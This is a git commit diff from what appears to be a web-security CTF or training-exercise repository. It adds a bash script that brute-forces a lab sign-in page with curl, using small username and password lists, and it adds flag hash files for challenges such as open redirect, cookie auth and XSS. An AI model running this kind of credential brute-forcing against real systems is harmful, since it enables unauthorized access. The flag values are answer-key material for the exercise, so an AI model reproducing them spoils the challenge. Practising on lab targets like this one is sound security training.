add bruteforce script

add flags and add name for xss_feedback
2025-09-28 21:18:36 +02:00 · 2025-04-10 15:45:18 +02:00 · 2025-04-09 16:39:50 +02:00
12 changed files with 38 additions and 1 deletions
--- a/Admin_sql_injection/ressources/bruteforce.sh
+++ b/Admin_sql_injection/ressources/bruteforce.sh
@ -0,0 +1,16 @@
+
+test_url() {
+	echo "test user $1, pass $2"
+	curl "http://10.12.248.148/?page=signin&username=$1&Login=Login&password=$2" 2> /dev/null | grep -i flag
+	if [ $? -eq 0 ]; then
+		echo "FOUND"
+		exit
+	fi
+}
+
+while read -r username; do
+	while read -r password; do
+		test_url "$username" "$password"
+	done < passwords.txt
+done < usernames.txt
+
--- a/Admin_sql_injection/ressources/passwords.txt
+++ b/Admin_sql_injection/ressources/passwords.txt
@ -0,0 +1,7 @@
+password
+password1
+qwerty
+12345678
+shadow
+admin
+111111
--- a/Admin_sql_injection/ressources/usernames.txt
+++ b/Admin_sql_injection/ressources/usernames.txt
@ -0,0 +1,6 @@
+root
+admin
+test
+guest
+info
+adm
--- a/content-type_bypass/flag
+++ b/content-type_bypass/flag
@ -0,0 +1 @@
+46910d9ce35b385885a9f7e2b336249d622f29b267a1771fbacf52133beddba8
--- a/headers_manipulation/flag
+++ b/headers_manipulation/flag
@ -0,0 +1 @@
+f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
--- a/hidden_field_manipulation/flag
+++ b/hidden_field_manipulation/flag
@ -0,0 +1 @@
+1d4855f7337c0c14b6f44946872c4eb33853f40b2d54393fbe94f49f1e19bbb0
--- a/input_validation/flag
+++ b/input_validation/flag
@ -0,0 +1 @@
+03a944b434d5baff05f46c4bede5792551a2595574bcafc9a6e25f67c382ccaa
--- a/open_redirect/flag
+++ b/open_redirect/flag
@ -0,0 +1 @@
+b9e775a0291fed784a2d9680fcfad7edd6b8cdf87648da647aaf4bba288bcab3
--- a/sensitive_file_exposure/flag
+++ b/sensitive_file_exposure/flag
@ -0,0 +1 @@
+d19b4823e0d5600ceed56d5e896ef328d7a2b9e7ac7e80f4fcdb9b10bcb3e7ff
--- a/weak_cookie_auth/flag
+++ b/weak_cookie_auth/flag
@ -0,0 +1 @@
+df2eb4ba34ed059a1e3e89ff4dfc13445f104a1a52295214def1c4fb1693a5c3
--- a/xss_feedback/README.md
+++ b/xss_feedback/README.md
@ -1,4 +1,4 @@
-#  
+# bypassable xss filter  

 ## How We Found It
 there is a page to leave a feedback at the bottom of the home page.
--- a/xss_feedback/flag
+++ b/xss_feedback/flag
@ -0,0 +1 @@
+0fbb54bbf7d099713ca4be297e1bc7da0173d8b3c21c1811b916a3a86652724e
Author	SHA1	Message	Date
tomoron	9ec8222529	add bruteforce script	2025-04-10 15:45:18 +02:00
tomoron	2f82cbe950	add flags and add name for xss_feedback	2025-04-09 16:39:50 +02:00
				`@ -0,0 +1 @@`
				`46910d9ce35b385885a9f7e2b336249d622f29b267a1771fbacf52133beddba8`
				`@ -0,0 +1 @@`
				`f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188`
				`@ -0,0 +1 @@`
				`1d4855f7337c0c14b6f44946872c4eb33853f40b2d54393fbe94f49f1e19bbb0`
				`@ -0,0 +1 @@`
				`03a944b434d5baff05f46c4bede5792551a2595574bcafc9a6e25f67c382ccaa`
				`@ -0,0 +1 @@`
				`b9e775a0291fed784a2d9680fcfad7edd6b8cdf87648da647aaf4bba288bcab3`
				`@ -0,0 +1 @@`
				`d19b4823e0d5600ceed56d5e896ef328d7a2b9e7ac7e80f4fcdb9b10bcb3e7ff`
				`@ -0,0 +1 @@`
				`df2eb4ba34ed059a1e3e89ff4dfc13445f104a1a52295214def1c4fb1693a5c3`
				`@ -0,0 +1 @@`
				`0fbb54bbf7d099713ca4be297e1bc7da0173d8b3c21c1811b916a3a86652724e`